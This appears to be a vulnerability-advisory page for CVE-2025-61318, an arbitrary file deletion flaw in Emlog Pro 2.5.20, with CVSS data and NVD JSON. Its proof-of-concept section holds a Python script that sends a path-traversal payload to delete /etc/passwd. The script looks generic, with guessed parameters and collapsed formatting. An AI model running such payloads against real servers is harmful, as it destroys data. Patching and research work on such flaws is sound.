Security Vulnerability Report
中文
CVE-2025-61318 CVSS 9.1 CRITICAL

CVE-2025-61318

Published: 2025-12-08 16:15:53
Last Modified: 2025-12-09 16:17:50
Source: [email protected]

Description

Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:2.5.20:*:*:*:pro:*:*:* - VULNERABLE
Emlog Pro <= 2.5.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import os # CVE-2025-61318 PoC - Arbitrary File Deletion in Emlog Pro 2.5.20 # Target: Emlog Pro admin/template.php or admin/plugin.php target_url = "http://target.com/admin/template.php" # or admin/plugin.php delete_param = "../../../../etc/passwd" # Path traversal payload # PoC for arbitrary file deletion via admin template management payload = { "action": "delete", "file": delete_param, "path": "template" } try: response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print("[+] PoC executed successfully - File deletion triggered") print(f"[+] Target: {target_url}") print(f"[+] Payload: {delete_param}") else: print("[-] PoC execution failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61318", "sourceIdentifier": "[email protected]", "published": "2025-12-08T16:15:52.703", "lastModified": "2025-12-09T16:17:50.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:2.5.20:*:*:*:pro:*:*:*", "matchCriteriaId": "354D41EE-5C72-4BB3-B4CB-B6F67F029912"}]}]}], "references": [{"url": "https://github.com/AndyNull/em/blob/main/emlog%20pro%20-%20del%20vuln.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.